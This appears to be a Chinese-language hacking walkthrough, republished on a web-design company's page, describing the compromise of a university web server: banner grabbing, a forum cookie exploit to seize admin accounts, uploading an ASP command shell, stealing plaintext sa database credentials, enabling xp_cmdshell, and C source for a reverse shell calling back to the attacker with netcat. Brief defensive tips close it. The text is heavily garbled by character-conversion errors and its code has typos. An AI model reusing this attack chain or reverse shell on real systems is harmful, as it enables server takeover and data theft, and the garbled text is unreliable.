許多公司或公司將其Web效勞器放在內(nèi)網(wǎng),并在防火墻上做映射,將來自80端口的懇求轉(zhuǎn)向一臺內(nèi)網(wǎng)Web效勞器的Web端口。
這樣做安全性是提高了不少,但并不代表將Web效勞器躲藏在內(nèi)網(wǎng)就必定安全了,由于Web效勞器自身仍是存在許多疑問的,特別是一些CG,程序,通常這是大家最簡單忽略的當(dāng)?shù)亍O旅婢鸵砸慌_敞開80端口的Web效勞器為例,來測驗(yàn)其存在的安全隱患疑問,并且對存在疑問做測驗(yàn)描繪,指出疑問的癥結(jié)所在并給出防備錯施。
這是某大學(xué)的文娛休閑網(wǎng)站,進(jìn)入看了看,頁面做得不錯,先看一看是什么Web效勞器吧。
D:\ne -vv www.target.com 80
DNS fwd/rev mismatch:www.target.com!=traget
www.target.com[192.168.0.1]80(http)open
GEP/HTTP/1.0
HOST:www.target.com
HTTP/1.1 200 OK
Server:Microsoft-IIS/5.0
Content-location:http://www.target.com/index.asp
Date:Thu,22 May 2003 12:13:32 GMT
Content-Type:text/html
......
是IIS5.0,看看能不能直接溢出。用最新的IIS的WebDav溢出試試。個(gè)人感覺isno寫的那個(gè)溢出對比好用,但由于它是在內(nèi)網(wǎng),這個(gè)東西致使溢出后會直接在7788端口綁定一個(gè)cmd,這對咱們的這次侵略來說肯定是不可的。所以,我將它修改了一下,使它能夠反向銜接,但終究仍是不可,看來對方是打了補(bǔ)丁的。
又逛了一下其他版面,看到有個(gè)BBS,是動網(wǎng)的論壇并且版別還對比低(5.00320)。不錯,這通常是咱們的突破口(榜首大失利)。很早曾經(jīng)我和我的好友pskey曾發(fā)現(xiàn)一個(gè)它的cookie變量未過濾縫隙,他還寫了一個(gè)Exploit(程序放在光盤中)。經(jīng)過這個(gè)縫隙,我能夠隨意更改恣意用戶(包含總版主)的用戶暗碼。我用這個(gè)ID進(jìn)入,進(jìn)到后臺辦理,修改設(shè)置,答應(yīng)上載exe、asp等文件。再看看有沒有禁用FSO,成果沒有禁用(第二大失利)。我經(jīng)過它上載了一個(gè)aspcmdshell。這個(gè)aspcmdshell能夠使我以guests組權(quán)限的用戶在Web效勞器上履行指令,當(dāng)然,前題是它沒有扔掉guests組對%systemroot%\winnt\cdm.exe的拜訪履行權(quán)限。試試"dir c:\"看看,公然沒有制止運(yùn)轉(zhuǎn)(第三大失利)。其實(shí),假如它制止了cmd.exe的運(yùn)轉(zhuǎn)權(quán)限也不要緊的,咱們能夠自已上載一個(gè)上去,再改一下這個(gè)aspcmdshell就能夠了。有了這個(gè)aspcmdshell,咱們能夠做許多工作。當(dāng)然這還不夠,我的意圖是拿到最高權(quán)限。此刻我就預(yù)備提高權(quán)限了。先看一看辦理員給了guests組哪些權(quán)限,看一下ipconfig的回來成果:
Windows 2000 IP Configuration
Ethernet adapter本地銜接:
Connection-specific DNS Suffix.:
IP Address.................: 192.168.1.222
Subnet Mask................: 255.255.255.0
Default Gateway............: 192.168.1.1
喲,在內(nèi)網(wǎng),不錯,再試試C:\可不可寫,答案是不可寫(不錯)。再試試其他目錄,整個(gè)C.盤都不可寫,只給了Web目錄的可寫權(quán)限。再看一看跑了哪些效勞,用netstat -an指令來檢查一下。
TCP 127.0.0.1:1433 0.0.0.0:0 LISTENING喲!還跑了MSSQL的,不錯。這時(shí)分榜首個(gè)想做的即是看看哪些程序運(yùn)用了MSSQL數(shù)據(jù)庫。再到主頁上逛逛,看到有一個(gè)新聞體系,很有能夠即是它。用剛才那個(gè)aspcmdshell去檢查一下這個(gè)news/目錄里邊的ASP程序,看到許多文件榜首行都有,根本上這個(gè)即是數(shù)據(jù)庫的銜接程序了。檢查一下:
strconn="Driver={SQL erver};Ddescription=sqldemo;
SERVER=127.0.0.1;UID=sa;&
PWD=hello;DATABASE=news
set conn=server.createobject("adodb.connection")
conn.open strconn
公然不出我所料(第四大失利,將MSSQL的用戶名和暗碼以明文方式存放在ASP文件里),拿到了MSSQL數(shù)據(jù)庫的暗碼,并且仍是sa用戶的,權(quán)限對比大哦。本來想看看能不能查找一下新聞體系A(chǔ)SP程序的縫隙,運(yùn)用一下sql injection的??磥砣缃駨氐讻]有必要了。自個(gè)寫一個(gè)能夠用MSSQL拓展xp一cmdshell來履行體系指令的ASP程序,這里有能夠辦理員刪了這個(gè)拓展,或直接刪掉了xplog70.dll這個(gè)文件。不管它,先試試再說。寫sql.asp內(nèi)容如下:
自個(gè)先開防火墻,記載icmp數(shù)據(jù)包,然后在IE里履行:
http://www.target.com/bbs/uploadimages/439587438739.asp?cmd=ping%20192.168.0.1
這個(gè)ASP是經(jīng)過動網(wǎng)論壇自個(gè)的上載程序上載機(jī)程序設(shè)定把上載文件都上載到up1Oad土mageS/這個(gè)目錄里邊,根據(jù)當(dāng)時(shí)時(shí)間將文件重命名,所以文件名為439587438739·aSp這樣的全數(shù)字構(gòu)成。
防火墻沒反響,暈!看來是刪了Xp--CmdSheI1這個(gè)拓展,或直接刪掉了Xp1Og70·d11這個(gè)文件。假如沒有直接刪掉Xp1Og70·d11,而僅僅刪了這個(gè)拓展的話,我來試一下恢復(fù)這個(gè)拓展。再寫個(gè)ASP:
上載上去,再履行http://www.target.com/bbs/uploadimages/23456489432.asp.
然后再提交懇求:
http://www.target.com/bbs/uploadimages/
439587438739.asp?cmd=ping%192.168.0.1
呵呵,咱們的防火墻有反響了。來自www.target.com的icmp數(shù)據(jù)包被記載??磥頉]有疑問了,經(jīng)過這個(gè)ASP咱們能夠履行許多指令 (第五大失利),都是system權(quán)限,只不過沒有回顯,不是很完美。所以想得到一個(gè)交互式的she1l。寫個(gè)反連的程序吧:
#include
#include
#pragma comment(lib."ws2_32")
void main(int argc,char*argv[])
{
WSADATA wsaData;
SOCKET hSocket;
STARTUPINFO si;
PROCESS_INFORMATION pi;
struct sockaddr_in adik_sin;
memset(&adik_sin,0,sizeof(adik_sin));
memset(&si,0,sizeof(si));
WSAStartuup(MAKEWORD(2,0),&WSAdATA);
hSocket=WSASocket(AF_INET,
SOCK_STREMA,NULL,NULL,NULL,NULL);
adik_sin.sin_family=AF_INET;
adik_sin.sin_port=htons(53);//銜接到我的主機(jī)53端口
adik_sin.sin_addr.s_addr=inet_addr("192.
168.0.1:);//我的主機(jī)的IP
connect(hSocket.(struct sockaddr*)%adik_sin,
sizeof(adik_sin);
si.cb=sizeof(si)
si.dwFlags-STARTF_USESTDHANDLES;
si.hStdlnput=si.hStdOutput=si.hStdError
=(void*)hSocket;
CreateProcess(NULL."cmd.exe",NULL,
NULL,1,NULL,NULL,NULL,&si.&pi);
ExitProcess(0);
}
編譯成a.exe然后上載上去先在本機(jī)用nc監(jiān)聽一個(gè)端口53,然后在IE里履行:
http://www.target.com/bbs/uploadimages/439587438739.asp?cmd=D:\inetpub\wwwroot\bbs\uploadimages\3215645664654.exe
D:\nc-1 -p 53
Microsoft Windows 2000[Version 5.00.2195]
版權(quán)所有1985-2000Microsoft Corp:
D:\inetpub\wwwroot\bbs\uploadimages>ipconfig
windows 2000 IP Configuration
Ethernet adapter本地銜接:
Connection-specific DNS Suffix.:
IP Address..............:192.168.1.222
Subnet Mask.............:255.255.255.0
Default Gateway.........:192.168.1.1
D:\inetpub\wwwroot\bbs\uploadimages>
好了,到此為止,侵略根本上完成了,如今咱們現(xiàn)已拿到了一個(gè)system權(quán)限的交互式shell,咱們能夠"隨心所欲"了。這個(gè)時(shí)分咱們能夠裝一個(gè)后門,使得咱們萄次進(jìn)來不必這么費(fèi)事,我曾經(jīng)寫了"一個(gè)US-BACKDOOR。使咱們能夠經(jīng)過80端口來"得到一個(gè)交互式的shell,且不影響,IIS程序自身的。正常運(yùn)轉(zhuǎn)。這個(gè)backdoor能夠在我的主頁上下載到?! ∩厦娴膸状笫Ю沟迷蹅兠勘芤徊饺饲侄既〉昧烁嗟臋?quán)限,其實(shí)一個(gè)優(yōu)異的辦理員徹底能夠防止這些。所以,一個(gè)小小的ASP程序過錯都能夠使你的效勞器被Cracker損壞。程序員們,該留意一下你們的程序了。對于前面我說到的幾大失利,我稍稍總緒一下辦理"根本應(yīng)當(dāng)做到的當(dāng)?shù)?
(1)、不要運(yùn)用已知縫隙非常多的ASP程序,特別是像動網(wǎng)對比低的版別這類,即便運(yùn)用了,也要常常去官方論壇看看對比新的縫隙信息,及時(shí)打補(bǔ)丁或晉級程序。
(2)、假如沒有必要用到FSO,能夠禁用。
(3)、用cscls%systemroot%\winnt\cmd.exe/e/d guests指令,制止掉GUESTS組用戶拜訪cmd.exe。
(4)、盡量不要將數(shù)據(jù)庫的暗碼以明文的方式放在ASP程序里邊,能夠運(yùn)用數(shù)據(jù)源的方式來銜接數(shù)據(jù)庫。
(5)、通常用戶應(yīng)當(dāng)用不到xp_crndshell這個(gè)拓展的,那么最佳刪掉xplog70.dll;盡量不要用sa這個(gè)用戶。將sa的暗碼設(shè)雜亂一些,能夠另建一個(gè)用戶,把權(quán)限調(diào)到最低。
跋文
文中所說到的被進(jìn)犯的網(wǎng)站主并非一臺露出在外面的裸機(jī),而是經(jīng)過防火墻映射的放置在內(nèi)網(wǎng)的效勞。
企業(yè)網(wǎng)站建設(shè)解決方案 營銷型網(wǎng)站建設(shè)解決方案 行業(yè)門戶網(wǎng)站建設(shè)解決方案 外貿(mào)網(wǎng)站解建設(shè)決方案 品牌形象網(wǎng)站建設(shè)解決方案 購物商城網(wǎng)站建設(shè)解決方案 政府網(wǎng)站建設(shè)解決方案 手機(jī)網(wǎng)站建設(shè)解決方案 教育培訓(xùn)網(wǎng)站建設(shè)解決方案 珠寶高端奢飾品網(wǎng)站建設(shè)解決方案 房地產(chǎn)、地產(chǎn)項(xiàng)目網(wǎng)站建設(shè)解決方案 集團(tuán)、上市企業(yè)網(wǎng)站建設(shè)解決方案 數(shù)碼、電子產(chǎn)品網(wǎng)站建設(shè)解決方案 美容、化妝品行業(yè)網(wǎng)站建設(shè)解決方案
10年專業(yè)互聯(lián)網(wǎng)服務(wù)經(jīng)驗(yàn) 重慶最專業(yè)網(wǎng)站團(tuán)隊(duì) 資深行業(yè)分析策劃 B2C營銷型網(wǎng)站建設(shè)領(lǐng)先者 最前沿視覺設(shè)計(jì)、研發(fā)能力 時(shí)刻最新技術(shù)領(lǐng)先研發(fā)能力 具有完備的項(xiàng)目管理 完善的售后服務(wù)體系 深厚的網(wǎng)絡(luò)運(yùn)營經(jīng)驗(yàn)
中技互聯(lián)一直秉承專業(yè)、誠信、服務(wù)、進(jìn)取的價(jià)值觀,堅(jiān)持優(yōu)秀的商業(yè)道德,以用戶最終價(jià)值為導(dǎo)向,向用戶提供優(yōu)質(zhì)產(chǎn)品和優(yōu)質(zhì)服務(wù),從而贏得了用戶的信賴。始終以不懈的努力、更高的目標(biāo)來要求自己。
主營業(yè)務(wù):網(wǎng)站建設(shè) | 重慶網(wǎng)站建設(shè) | 重慶網(wǎng)站設(shè)計(jì) | 重慶網(wǎng)站制作 | 重慶網(wǎng)頁設(shè)計(jì) | 重慶網(wǎng)站開發(fā)